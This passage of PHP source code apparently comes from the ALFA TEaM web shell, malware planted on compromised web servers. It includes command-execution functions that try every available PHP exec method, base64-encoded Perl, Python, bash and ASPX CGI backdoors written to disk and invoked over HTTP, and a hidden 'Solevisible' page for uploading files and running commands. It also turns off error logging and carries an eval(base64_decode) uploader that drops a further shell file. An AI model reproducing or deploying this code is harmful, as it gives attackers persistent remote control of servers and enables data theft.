                    $i++;
                    if ($i >= strlen($str)) {
                        break;
                    }
                }
            }
            return __ZGVjb2Rlcg($enc_str);
        } else {
            return __ZGVjb2Rlcg($str);
        }
    }
    function _AlfaSecretKey()
    {
        $secret = @$_COOKIE["AlfaSecretKey"];
        if (!isset($_COOKIE["AlfaSecretKey"])) {
            $secret = uniqid(mt_rand(), true);
            __alfa_set_cookie("AlfaSecretKey", $secret);
        }
        return $secret;
    }
    function alfa_getColor($target)
    {
        if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != "") {
            return $GLOBALS["DB_NAME"]["color"][$target];
        } else {
            $target = $GLOBALS["__ALFA_COLOR__"][$target];
            if (is_array($target)) {
                return $target["key_color"];
            } else {
                return $target;
            }
        }
    }
    function alfaCssLoadColors()
    {
        $css = "";
        foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
            if (!is_array($value)) {
                $value = alfa_getColor($key);
                $css .= ".{$key}{color: {$value};}";
            } else {
                if (isset($value["multi_selector"])) {
                    foreach ($value["multi_selector"] as $k => $v) {
                        $color = alfa_getColor($key);
                        $code = str_replace("{color}", $color, $v);
                        $css .= $k . "{" . $code . "}";
                    }
                }
            }
        }
        return $css;
    }
    if (isset($_POST['ajax'])) {
        function AlfaNum()
        {
            $args = func_get_args();
            $alfax = array();
            $find = array();
            for ($i = 1; $i <= 10; $i++) {
                $alfax[] = $i;
            }
            foreach ($args as $arg) {
                $find[] = $arg;
            }
            echo "<script>";
            foreach ($alfax as $alfa) {
                if (in_array($alfa, $find)) {
                    continue;
                }
                echo 'alfa' . $alfa . "_=";
            }
            echo "\"\"</script>";
        }
    }
    function _alfa_cgicmd($cmd, $lang = "perl", $set_cookie = false)
    {
        if (!$GLOBALS["DB_NAME"]["cgi_api"]) {
            return "";
        }
        if (isset($_COOKIE["alfacgiapi_mode"])) {
            return "";
        }
        $cmd_pure = $cmd;
        $is_curl = function_exists('curl_version');
        $is_socket = function_exists('fsockopen');
        if ($is_curl || $is_socket) {
            $recreate = false;
            if (isset($_COOKIE["alfacgiapi"])) {
                if (!@file_exists("alfacgiapi/" . $_COOKIE["alfacgiapi"] . ".alfa")) {
                    $recreate = true;
                    $lang = $_COOKIE["alfacgiapi"];
                }
            }
            if (!isset($_COOKIE["alfacgiapi"]) || $recreate) {
                @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
                $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
                $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
                $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
                $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";
                if ($lang == "perl") {
                    $source = $perl;
                } elseif ($lang == "py") {
                    $source = $py;
                } else {
                    $source = $bash;
                }
                if ($lang == "aspx") {
                    alfaWriteTocgiapi("aspx.aspx", $aspx);
                } else {
                    alfaWriteTocgiapi($lang . ".alfa", $source);
                }
                alfacgihtaccess('cgi', "alfacgiapi/");
            } else {
                $lang = $_COOKIE["alfacgiapi"];
            }
            $cgi_ext = ".alfa";
            if ($lang == "aspx") {
                $cgi_ext = ".aspx";
            }
            $cgi_url = "ALFA_DATA/alfacgiapi/" . $lang . $cgi_ext;
            $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=" . __ZW5jb2Rlcg("cd " . $GLOBALS['cwd'] . ";" . $cmd);
            if ($is_curl) {
                $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://") . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . "/" . $cgi_url;
                $post = new AlfaCURL();
                $data = $post->Send($address, "post", $cmd);
            } elseif ($is_socket) {
                $server = $_SERVER["SERVER_NAME"];
                $uri = dirname($_SERVER["REQUEST_URI"]) . "/" . $cgi_url;
                $data = _alfa_fsockopen($server, $uri, $cmd);
            }
            $out = "";
            if (strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]<pre>"+output+"</pre>') === false) {
                if ($set_cookie) {
                    __alfa_set_cookie("alfacgiapi", $lang);
                }
                if (@preg_match("/<pre>(.*?)<\\/pre>/s", $data, $res)) {
                    $out = $res[1];
                }
            } elseif ($lang == "perl") {
                return _alfa_cgicmd($cmd_pure, "py", $set_cookie);
            } elseif ($lang == "py") {
                return _alfa_cgicmd($cmd_pure, "bash", $set_cookie);
            } elseif ($lang == "bash" && $GLOBALS['sys'] == "win") {
                return _alfa_cgicmd($cmd_pure, "aspx", $set_cookie);
            } else {
                if ($set_cookie) {
                    __alfa_set_cookie("alfacgiapi_mode", "off");
                }
            }
            return trim($out);
        } else {
            return "";
        }
    }
    function alfaGetCwd()
    {
        if (function_exists("getcwd")) {
            return @getcwd();
        } else {
            return dirname($_SERVER["SCRIPT_FILENAME"]);
        }
    }
    function alfaEx($in, $re = false, $cgi = true, $all = false)
    {
        $data = _alfa_php_cmd($in, $re);
        if (empty($data) && $cgi || $all) {
            if ($GLOBALS['sys'] == 'unix') {
                if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) {
                    $cmd = _alfa_cgicmd($in);
                    if (!empty($cmd)) {
                        return $cmd;
                    }
                }
            }
        }
        return $data;
    }
    function _alfa_php_cmd($in, $re = false)
    {
        $out = '';
        try {
            if ($re) {
                $in .= " 2>&1";
            }
            if (function_exists('exec')) {
                @exec($in, $out);
                $out = @join("\n", $out);
            } elseif (function_exists('passthru')) {
                ob_start();
                @passthru($in);
                $out = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                @system($in);
                $out = ob_get_clean();
            } elseif (function_exists('shell_exec')) {
                $out = shell_exec($in);
            } elseif (function_exists("popen") && function_exists("pclose")) {
                if (is_resource($f = @popen($in, "r"))) {
                    $out = "";
                    while (!@feof($f)) {
                        $out .= fread($f, 1024);
                    }
                    pclose($f);
                }
            } elseif (function_exists('proc_open')) {
                $pipes = array();
                $process = @proc_open($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
                $out = @stream_get_contents($pipes[1]);
            } elseif (class_exists('COM')) {
                $alfaWs = new COM('WScript.shell');
                $exec = $alfaWs->exec('cmd.exe /c ' . $_POST['alfa1']);
                $stdout = $exec->StdOut();
                $out = $stdout->ReadAll();
            }
        } catch (Exception $e) {
        }
        return $out;
    }
    function _alfa_fsockopen($server, $uri, $post)
    {
        $socket = @fsockopen($server, 80, $errno, $errstr, 15);
        if ($socket) {
            $http = "POST {$uri} HTTP/1.0\r\n";
            $http .= "Host: {$server}\r\n";
            $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
            $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
            $http .= "Content-length: " . strlen($post) . "\r\n";
            $http .= "Connection: close\r\n\r\n";
            $http .= $post . "\r\n\r\n";
            fwrite($socket, $http);
            $contents = "";
            while (!@feof($socket)) {
                $contents .= @fgets($socket, 4096);
            }
            list($header, $body) = explode("\r\n\r\n", $contents, 2);
            @fclose($socket);
            return $body;
        } else {
            return "";
        }
    }
    if (isset($_GET["solevisible"])) {
        @error_reporting("\x00\x00\x0f\x03\x18");
        echo "<html>";
        echo "<title>Solevisible Hidden Shell</title>";
        echo "<body bgcolor=#000000>";
        echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">' . (function_exists('php_uname') ? php_uname() : '???') . '</font></b></big>';
        $safe_mode = @ini_get('safe_mode');
        if ($safe_mode) {
            $r = "<b style='color: red'>On</b>";
        } else {
            $r = "<b style='color: green'>Off</b>";
        }
        echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>PHP_OS</font><br>";
        echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
        echo "PHP Version: <font color=white>PHP_VERSION</font><br />";
        echo "PWD:<font color=#FFFFFF> " . str_replace("\\", "/", @alfaGetCwd()) . "/<br />";
        echo "<b style='color: #7CFC00'>Safe Mode : {$r}<br>";
        echo "<font color=#7CFC00>Disable functions : </font>";
        $disfun = @ini_get('disable_functions');
        if (empty($disfun)) {
            $disfun = '<font color="green">NONE</font>';
        }
        echo "<font color=red>";
        echo "{$disfun}";
        echo "</font><br>";
        echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
        echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>" . (function_exists('gethostbyname') ? @gethostbyname($_SERVER["HTTP_HOST"]) : '???') . "</font><br><p>";
        echo "<hr><center><form onSubmit=\"this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));\" action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
        echo 'CWD: <input type="text" name="cwd" value="' . str_replace("\\", "/", @alfaGetCwd()) . '/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
        if (isset($_FILES['file'])) {
            if (@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']) . '/' . $_FILES['file']['name'])) {
                echo "<b><font color=\"#7CFC00\"><center>Upload Successfully ;)</font></a><font color=\"#7CFC00\"></b><br><br></center>";
            } else {
                echo "<center><b><font color=\"#7CFC00\">Upload failed :(</font></a><font color=\"#7CFC0\"></b></center><br><br>";
            }
        }
        echo "<hr><form onSubmit=\"this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));\" method=\"POST\">Execute Command: <input name=\"command_solevisible\" value=\"\" size=\"59\" type=\"text\" align=\"left\" ><input name=\"execute\" value=\"Execute\" type=\"submit\"><br></form>\r\n<hr><pre>";
        if (isset($_POST['command_solevisible'])) {
            if (strtolower("PHP") == "win") {
                $separator = '&';
            } else {
                $separator = ';';
            }
            $solevisible = "cd '" . addslashes(str_replace("\\", "/", @alfaGetCwd())) . "'" . $separator . "" . __ZGVjb2Rlcg($_POST['command_solevisible']);
            echo alfaEx($solevisible);
        }
        echo "</pre>\r\n</body></html>";
        exit;
    }
    @error_reporting("\x00\x00\x0f\x03\x18");
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @ini_set('magic_quotes_runtime', 0);
    @set_time_limit(0);
    if (function_exists('set_magic_quotes_runtime')) {
        @set_magic_quotes_runtime(0);
    }
    foreach ($_POST as $key => $value) {
        if (is_array($_POST[$key])) {
            $i = 0;
            foreach ($_POST[$key] as $f) {
                $f = trim(str_replace(' ', '+', $f));
                $_POST[$key][$i] = decrypt_post($f);
                $i++;
            }
        } else {
            $value = trim(str_replace(' ', '+', $value));
            $_POST[$key] = decrypt_post($value);
        }
    }
    $default_action = 'FilesMan2';
    //'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    if (strtolower("PHP") == "win") {
        $GLOBALS['sys'] = 'win';
    } else {
        $GLOBALS['sys'] = 'unix';
    }
    $GLOBALS['home_cwd'] = @alfaGetCwd();
    $GLOBALS["need_to_update_header"] = "false";
    $GLOBALS['glob_chdir_false'] = false;
    if (isset($_POST['c'])) {
        if (!@chdir($_POST['c'])) {
            $GLOBALS['glob_chdir_false'] = true;
        }
    }
    $GLOBALS['cwd'] = isset($_POST['c']) && @is_dir($_POST['c']) ? $_POST['c'] : @alfaGetCwd();
    if ($GLOBALS['glob_chdir_false']) {
        $GLOBALS['cwd'] = isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd();
    }
    if ($GLOBALS['sys'] == 'win') {
        $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
        $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
    }
    if ($GLOBALS['cwd'][strlen($GLOBALS['cwd']) - 1] != '/') {
        $GLOBALS['cwd'] .= '/';
    }
    if (!function_exists('sys_get_temp_dir')) {
        function sys_get_temp_dir()
        {
            foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {
                if ($temp = getenv($env_var)) {
                    return $temp;
                }
            }
            $temp = tempnam($GLOBALS['__file_path'], '');
            if (_alfa_file_exists($temp, false)) {
                unlink($temp);
                return dirname($temp);
            }
            return null;
        }
    }
    if (!function_exists("mb_strlen")) {
        function mb_strlen($str, $c = "")
        {
            return strlen($str);
        }
    }
    if (!function_exists("mb_substr")) {
        function mb_substr($str, $start, $end, $c = "")
        {
            return substr($str, $start, $end);
        }
    }
    define("ALFA_TEMPDIR", function_exists("sys_get_temp_dir") ? @is_writable(str_replace('\\', '/', sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable('.') ? '.' : false) : false);
    function alfahead()
    {
        $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
        $alfa_uploader = "\$x = base64_decode(\"PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+\");\$solevisible = fopen(\"solevisible.php\",\"w\");fwrite(\$solevisible,\$x);";
        define("ALFA_UPLOADER", "eval(base64_decode('" . __ZW5jb2Rlcg($alfa_uploader) . "'))");
        if (!isset($_POST['ajax'])) {
            function Alfa_GetDisable_Function()
            {
                $disfun = @ini_get('disable_functions');
                $afa = '<span class="header_show_all">All Functions Accessible</span>';
                if (empty($disfun)) {
                    return "<span class=\"header_show_all\">All Functions Accessible</span>";
                }
                $s = explode(',', $disfun);
                $s = array_unique($s);
                $i = 0;
                $b = 0;
                $func = array('system', 'exec', 'shell_exec', 'proc_open', 'popen', 'passthru', 'symlink', 'dl');
                $black_list = array();
                $allow_list = array();
                foreach ($s as $d) {
                    $d = trim($d);
                    if (empty($d) || !is_callable($d)) {
                        continue;
                    }
                    if (!function_exists($d)) {
                        if (in_array($d, $func)) {
                            $dis .= $d . " | ";
                            $b++;
                            $black_list[] = $d;
                        } else {
                            $allow_list[] = $d;
                        }
                        $i++;
                    }
                }
                if ($i == 0) {
                    return $afa;
                }
                if ($i <= count($func)) {
                    $all = array_values(array_merge($black_list, $allow_list));
                    return '<span class="disable_functions">' . implode(" | ", $all) . '</span>';
                }
                return '<span class="disable_functions">' . $dis . '</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All (' . $i . ')</span></a>';
            }
            function AlfaNum()
            {
                $args = func_get_args();
                $alfax = array();
                $find = array();
                for ($i = 1; $i <= 10; $i++) {
                    $alfax[] = $i;
                }
                foreach ($args as $arg) {
                    $find[] = $arg;
                }
                echo "<script>";
                foreach ($alfax as $alfa) {
                    if (in_array($alfa, $find)) {
                        continue;
                    }
                    echo 'alfa' . $alfa . "_=";
                }
                echo "\"\"</script>";
            }
            if (empty($_POST['charset'])) {
                $_POST['charset'] = $GLOBALS['default_charset'];
            }
            $freeSpace = function_exists('diskfreespace') ? @diskfreespace($GLOBALS['cwd']) : '?';
            $totalSpace = function_exists('disk_total_space') ? @disk_total_space($GLOBALS['cwd']) : '?';
            $totalSpace = $totalSpace ? $totalSpace : 1;
            $on = "<span class='header_on'> ON </span>";
            $of = "<span class='header_off'> OFF </span>";
            $none = "<span class='header_none'> NONE </span>";
            if (function_exists('ssh2_connect')) {
                $ssh2 = $on;
            } else {
                $ssh2 = $of;
            }
            if (function_exists('curl_version')) {
                $curl = $on;
            } else {
                $curl = $of;
            }
            if (function_exists('mysql_get_client_info') || class_exists('mysqli')) {
                $mysql = $on;
            } else {
                $mysql = $of;
            }
            if (function_exists('mssql_connect')) {
                $mssql = $on;
            } else {
                $mssql = $of;
            }
            if (function_exists('pg_connect')) {
                $pg = $on;
            } else {
                $pg = $of;
            }
            if (function_exists('oci_connect')) {
                $or = $on;
            } else {
                $or = $of;
            }
            if (@ini_get('disable_functions')) {
                $disfun = @ini_get('disable_functions');
            } else {
                $disfun = "All Functions Enable";
            }
            if (@ini_get('safe_mode')) {
                $safe_modes = "<span class='header_off'>ON</span>";
            } else {
                $safe_modes = "<span class='header_on'>OFF</span>";
            }
            $cgi_shell = "<span class='header_off' id='header_cgishell'>OFF</span>";
            if (@ini_get('open_basedir')) {
                $basedir_data = @ini_get('open_basedir');
                if (strlen($basedir_data) > 120) {
                    $open_b = substr($basedir_data, 0, 120) . "...";
                } else {
                    $open_b = $basedir_data;
                }
            } else {
                $open_b = $none;
            }
            if (@ini_get('safe_mode_exec_dir')) {
                $safe_exe = @ini_get('safe_mode_exec_dir');
            } else {
                $safe_exe = $none;
            }
            if (@ini_get('safe_mode_include_dir')) {
                $safe_include = @ini_get('safe_mode_include_dir');
            } else {
                $safe_include = $none;
            }
            if (!function_exists('posix_getegid')) {
                $user = function_exists("get_current_user") ? @get_current_user() : "????";
                $uid = function_exists("getmyuid") ? @getmyuid() : "????";
                $gid = function_exists("getmygid") ? @getmygid() : "????";
                $group = "?";
            } else {
                $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : array("name" => "????", "uid" => "????");
                $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : array("name" => "????", "gid" => "????");
                $user = $uid['name'];
                $uid = $uid['uid'];
                $group = $gid['name'];
                $gid = $gid['gid'];
            }
            $cwd_links = '';
            $path = explode("/", $GLOBALS['cwd']);
            $n = count($path);
            for ($i = 0; $i < $n - 1; $i++) {
                $cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
                $cach_cwd_path = "";
                for ($j = 0; $j <= $i; $j++) {
                    $cwd_links .= $path[$j] . '/';
                    $cach_cwd_path .= $path[$j] . '/';
                }
                $cwd_links .= "\")' path='" . $cach_cwd_path . "' href='#action=fileman&path=" . $cach_cwd_path . "'>" . $path[$i] . "/</a>";
            }
            $drives = "";
            foreach (range('a', 'z') as $drive) {
                if (@is_dir($drive . ':\\')) {
                    $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
                }
            }
            $csscode = '	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
            echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">";
            ?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />

<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
<title>..:: <?php 
            echo $_SERVER['HTTP_HOST'] . ' ~ ALFA TEaM Shell - v' . __ALFA_VERSION__ . '-' . __ALFA_CODE_NAME__;
            ?> ::..</title>
<style type="text/css">
